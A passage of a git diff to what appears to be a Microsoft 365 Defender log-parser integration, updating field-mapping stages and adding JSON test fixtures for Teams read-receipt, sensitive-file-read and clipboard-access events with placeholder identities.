json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:] != [""]}}' + + - set: + process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.ProcessCommandLine.split(" ")[1:] != [""]}}' + set_alert_evidence_fields: actions: - set: @@ -341,7 +419,6 @@ stages: event.dataset: "device_events" event.category: ["host"] action.properties.RemoteDeviceName: "{{json_event.message.properties.RemoteDeviceName}}" - action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" set_device_file_certificate_info_fields: actions: - set: @@ -454,15 +531,6 @@ stages: - set: event.dataset: "device_process_events" event.category: ["process"] - process.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}" - process.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}" - action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" - action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" - action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" - action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" - action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" - action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" - action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" set_device_registry_events_fields: actions: - set: diff --git a/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json b/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json index d60cc39a1..764942b33 100644 --- a/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json +++ b/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json @@ -84,6 +84,12 @@ ], "type": "Run" }, + "operation": { + "properties": { + "IsThrottled": "False", + "MailAccessType": "Bind" + } + }, "report": { "id": "98261974_20893_f747c19c-0664-45c8-aac9-8f16e7714de1" } diff --git a/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json b/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json new file mode 100644 index 000000000..86f044fe7 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json @@ -0,0 +1,63 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:24:31.9854915Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:20:30.0960000Z\",\"properties\":{\"ActionType\":\"MessageReadReceiptReceived\",\"ApplicationId\":28375,\"AccountDisplayName\":\"John DOE\",\"AccountObjectId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"AccountId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"DeviceType\":null,\"OSPlatform\":null,\"IPAddress\":null,\"IsAnonymousProxy\":null,\"CountryCode\":null,\"City\":null,\"ISP\":null,\"UserAgent\":null,\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Microsoft Team\"},{\"Type\":\"User\",\"Role\":\"Actor\",\"Name\":\"John DOE\",\"Id\":\"abcd1234-1234-1234-1234-abcdef123456\",\"ApplicationId\":11161,\"ApplicationInstance\":0}],\"AdditionalFields\":{},\"ActivityType\":\"Basic\",\"ObjectName\":null,\"ObjectType\":null,\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Regular\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":null,\"IPCategory\":null,\"UserAgentTags\":null,\"RawEventData\":{\"ChatThreadId\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"CommunicationType\":\"GroupChat\",\"CreationTime\":\"2024-10-28T14:18:38Z\",\"ExtraProperties\":[],\"Id\":\"abcd1234-ef09-1234-abcd-123456abcdef\",\"ItemName\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"MessageId\":\"1730125116564\",\"MessageVersion\":\"0\",\"MessageVisibilityTime\":\"2022-09-21T08:33:35Z\",\"Operation\":\"MessageReadReceiptReceived\",\"OrganizationId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"ParticipantInfo\":{\"HasForeignTenantUsers\":false,\"HasGuestUsers\":false,\"HasOtherGuestUsers\":false,\"HasUnauthenticatedUsers\":false,\"ParticipatingDomains\":[],\"ParticipatingSIPDomains\":[],\"ParticipatingTenantIds\":[\"12345678-abcd-ef09-1234-123456abcdef\"]},\"RecordType\":25,\"ResourceTenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"UserId\":\"john.doe@company.fr\",\"UserKey\":\"abcd1234-1234-1234-1234-abcdef123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"},\"ReportId\":\"98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"Application\":\"Microsoft Teams\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-10-28T14:24:31.9854915Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:20:30.0960000Z\",\"properties\":{\"ActionType\":\"MessageReadReceiptReceived\",\"ApplicationId\":28375,\"AccountDisplayName\":\"John DOE\",\"AccountObjectId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"AccountId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"DeviceType\":null,\"OSPlatform\":null,\"IPAddress\":null,\"IsAnonymousProxy\":null,\"CountryCode\":null,\"City\":null,\"ISP\":null,\"UserAgent\":null,\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Microsoft Team\"},{\"Type\":\"User\",\"Role\":\"Actor\",\"Name\":\"John DOE\",\"Id\":\"abcd1234-1234-1234-1234-abcdef123456\",\"ApplicationId\":11161,\"ApplicationInstance\":0}],\"AdditionalFields\":{},\"ActivityType\":\"Basic\",\"ObjectName\":null,\"ObjectType\":null,\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Regular\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":null,\"IPCategory\":null,\"UserAgentTags\":null,\"RawEventData\":{\"ChatThreadId\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"CommunicationType\":\"GroupChat\",\"CreationTime\":\"2024-10-28T14:18:38Z\",\"ExtraProperties\":[],\"Id\":\"abcd1234-ef09-1234-abcd-123456abcdef\",\"ItemName\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"MessageId\":\"1730125116564\",\"MessageVersion\":\"0\",\"MessageVisibilityTime\":\"2022-09-21T08:33:35Z\",\"Operation\":\"MessageReadReceiptReceived\",\"OrganizationId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"ParticipantInfo\":{\"HasForeignTenantUsers\":false,\"HasGuestUsers\":false,\"HasOtherGuestUsers\":false,\"HasUnauthenticatedUsers\":false,\"ParticipatingDomains\":[],\"ParticipatingSIPDomains\":[],\"ParticipatingTenantIds\":[\"12345678-abcd-ef09-1234-123456abcdef\"]},\"RecordType\":25,\"ResourceTenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"UserId\":\"john.doe@company.fr\",\"UserKey\":\"abcd1234-1234-1234-1234-abcdef123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"},\"ReportId\":\"98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"Application\":\"Microsoft Teams\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "network" + ], + "dataset": "cloud_app_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:38Z", + "action": { + "properties": { + "Application": "Microsoft Teams", + "ApplicationId": "28375", + "IsAdminOperation": "false", + "IsExternalUser": false, + "IsImpersonated": false, + "RawEventData": "{\"ChatThreadId\": \"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\", \"CommunicationType\": \"GroupChat\", \"CreationTime\": \"2024-10-28T14:18:38Z\", \"ExtraProperties\": [], \"Id\": \"abcd1234-ef09-1234-abcd-123456abcdef\", \"ItemName\": \"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\", \"MessageId\": \"1730125116564\", \"MessageVersion\": \"0\", \"MessageVisibilityTime\": \"2022-09-21T08:33:35Z\", \"Operation\": \"MessageReadReceiptReceived\", \"OrganizationId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"ParticipantInfo\": {\"HasForeignTenantUsers\": false, \"HasGuestUsers\": false, \"HasOtherGuestUsers\": false, \"HasUnauthenticatedUsers\": false, \"ParticipatingDomains\": [], \"ParticipatingSIPDomains\": [], \"ParticipatingTenantIds\": [\"12345678-abcd-ef09-1234-123456abcdef\"]}, \"RecordType\": 25, \"ResourceTenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"UserId\": \"john.doe@company.fr\", \"UserKey\": \"abcd1234-1234-1234-1234-abcdef123456\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"MicrosoftTeams\"}" + }, + "type": "MessageReadReceiptReceived" + }, + "microsoft": { + "defender": { + "activity": { + "objects": [ + { + "Role": "Parameter", + "ServiceObjectType": "Microsoft Team", + "Type": "Structured object" + }, + { + "ApplicationId": 11161, + "ApplicationInstance": 0, + "Id": "abcd1234-1234-1234-1234-abcdef123456", + "Name": "John DOE", + "Role": "Actor", + "Type": "User" + } + ], + "type": "Basic" + }, + "report": { + "id": "98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef" + } + } + }, + "user": { + "full_name": "John DOE" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json new file mode 100644 index 000000000..2655cb069 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json @@ -0,0 +1,97 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:48.4363168Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:28.1484017Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":73291,\"InitiatingProcessId\":1328,\"InitiatingProcessCreationTime\":\"2024-11-12T10:17:23.9905327Z\",\"InitiatingProcessCommandLine\":\"\\\"Browser.exe\\\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0\",\"InitiatingProcessParentFileName\":\"Windows.exe\",\"InitiatingProcessParentId\":1820,\"InitiatingProcessParentCreationTime\":\"2024-10-14T05:47:54.3243814Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"browser.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\browser.exe\",\"InitiatingProcessAccountName\":\"username\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":null,\"MD5\":null,\"FileName\":\"FileName.mdb\",\"FolderPath\":\"C:\\\\Log\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"SensitiveFileRead\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":5223047,\"AccountSid\":\"S-1-2-3\",\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"USERNAME@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-ef09-abcdef123456\",\"FileSize\":286720,\"InitiatingProcessFileSize\":3316224,\"InitiatingProcessVersionInfoCompanyName\":\"Test Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Test Product\",\"InitiatingProcessVersionInfoProductVersion\":\"1, 0, 0, 1\",\"InitiatingProcessVersionInfoInternalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Browser EXE\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:24.8588296Z\",\"MachineGroup\":\"PC\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T10:18:48.4363168Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:28.1484017Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":73291,\"InitiatingProcessId\":1328,\"InitiatingProcessCreationTime\":\"2024-11-12T10:17:23.9905327Z\",\"InitiatingProcessCommandLine\":\"\\\"Browser.exe\\\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0\",\"InitiatingProcessParentFileName\":\"Windows.exe\",\"InitiatingProcessParentId\":1820,\"InitiatingProcessParentCreationTime\":\"2024-10-14T05:47:54.3243814Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"browser.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\browser.exe\",\"InitiatingProcessAccountName\":\"username\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":null,\"MD5\":null,\"FileName\":\"FileName.mdb\",\"FolderPath\":\"C:\\\\Log\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"SensitiveFileRead\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":5223047,\"AccountSid\":\"S-1-2-3\",\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"USERNAME@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-ef09-abcdef123456\",\"FileSize\":286720,\"InitiatingProcessFileSize\":3316224,\"InitiatingProcessVersionInfoCompanyName\":\"Test Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Test Product\",\"InitiatingProcessVersionInfoProductVersion\":\"1, 0, 0, 1\",\"InitiatingProcessVersionInfoInternalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Browser EXE\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:24.8588296Z\",\"MachineGroup\":\"PC\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:17:24.858829Z", + "action": { + "properties": { + "AccountSid": "S-1-2-3", + "InitiatingProcessAccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", + "InitiatingProcessCommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "InitiatingProcessFileSize": 3316224, + "InitiatingProcessLogonId": "5223047", + "InitiatingProcessVersionInfoCompanyName": "Test Corporation", + "InitiatingProcessVersionInfoFileDescription": "Browser EXE", + "InitiatingProcessVersionInfoInternalFileName": "Browser.EXE", + "InitiatingProcessVersionInfoOriginalFileName": "Browser.EXE", + "InitiatingProcessVersionInfoProductName": "Test Product", + "InitiatingProcessVersionInfoProductVersion": "1, 0, 0, 1" + }, + "type": "SensitiveFileRead" + }, + "file": { + "directory": "C:\\Log", + "name": "FileName.mdb", + "size": 286720 + }, + "host": { + "id": "abcdef0123456789", + "name": "user.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "73291" + } + } + }, + "process": { + "args": [ + "/DBMode", + "/Network", + "/ProjectID", + "/Ticket", + "0", + "0", + "12345678-1234-5678-9012-345678901234", + "123456789" + ], + "command_line": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "executable": "c:\\program files (x86)\\browser.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "browser.exe", + "parent": { + "name": "Windows.exe", + "pid": 1820, + "start": "2024-10-14T05:47:54.324381Z" + }, + "pid": 1328, + "start": "2024-11-12T10:17:23.990532Z", + "user": { + "domain": "company", + "email": "USERNAME@COMPANY.COM", + "id": "S-1-2-3", + "name": "username" + }, + "working_directory": "c:\\program files (x86)" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json similarity index 100% rename from Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json rename to Microsoft/microsoft-365-defender/tests/test_device_events_2.json diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json new file mode 100644 index 000000000..3292ed6fe --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json @@ -0,0 +1,81 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T09:49:58.3460812Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T09:49:02.3098089Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.company.fr\",\"ReportId\":157950,\"InitiatingProcessId\":12824,\"InitiatingProcessCreationTime\":\"2024-11-12T10:09:31.1004556Z\",\"InitiatingProcessCommandLine\":\"\\\"OUTLOOK.EXE\\\" \",\"InitiatingProcessParentFileName\":\"exec.exe\",\"InitiatingProcessParentId\":18840,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:44:15.1503958Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"outlook.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files\\\\microsoft office\\\\root\\\\outlook.exe\",\"InitiatingProcessAccountName\":\"john.doe\",\"InitiatingProcessAccountDomain\":\"account-domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"GetClipboardData\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":389220681,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"john.doe@account-domain.fr\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-efab-56789123abcd\",\"FileSize\":null,\"InitiatingProcessFileSize\":44152968,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Outlook\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"Outlook\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Outlook.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Outlook\",\"InitiatingProcessSessionId\":12,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:19:26.5027772Z\",\"MachineGroup\":\"All_Win10_11\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T09:49:58.3460812Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T09:49:02.3098089Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.company.fr\",\"ReportId\":157950,\"InitiatingProcessId\":12824,\"InitiatingProcessCreationTime\":\"2024-11-12T10:09:31.1004556Z\",\"InitiatingProcessCommandLine\":\"\\\"OUTLOOK.EXE\\\" \",\"InitiatingProcessParentFileName\":\"exec.exe\",\"InitiatingProcessParentId\":18840,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:44:15.1503958Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"outlook.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files\\\\microsoft office\\\\root\\\\outlook.exe\",\"InitiatingProcessAccountName\":\"john.doe\",\"InitiatingProcessAccountDomain\":\"account-domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"GetClipboardData\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":389220681,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"john.doe@account-domain.fr\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-efab-56789123abcd\",\"FileSize\":null,\"InitiatingProcessFileSize\":44152968,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Outlook\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"Outlook\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Outlook.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Outlook\",\"InitiatingProcessSessionId\":12,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:19:26.5027772Z\",\"MachineGroup\":\"All_Win10_11\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:19:26.502777Z", + "action": { + "properties": { + "InitiatingProcessAccountObjectId": "12345678-abcd-1234-efab-56789123abcd", + "InitiatingProcessCommandLine": "\"OUTLOOK.EXE\" ", + "InitiatingProcessFileSize": 44152968, + "InitiatingProcessLogonId": "389220681", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft Outlook", + "InitiatingProcessVersionInfoInternalFileName": "Outlook", + "InitiatingProcessVersionInfoOriginalFileName": "Outlook.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft Outlook", + "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216" + }, + "type": "GetClipboardData" + }, + "host": { + "id": "abcdef0123456789", + "name": "device.company.fr" + }, + "microsoft": { + "defender": { + "report": { + "id": "157950" + } + } + }, + "process": { + "command_line": "\"OUTLOOK.EXE\" ", + "executable": "c:\\program files\\microsoft office\\root\\outlook.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "outlook.exe", + "parent": { + "name": "exec.exe", + "pid": 18840, + "start": "2024-11-12T08:44:15.150395Z" + }, + "pid": 12824, + "start": "2024-11-12T10:09:31.100455Z", + "user": { + "domain": "account-domain", + "email": "john.doe@account-domain.fr", + "id": "S-1-2-3", + "name": "john.doe" + }, + "working_directory": "c:\\program files\\microsoft office\\root" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json new file mode 100644 index 000000000..fea26327a --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json @@ -0,0 +1,81 @@ +{ + "input": { + "message": 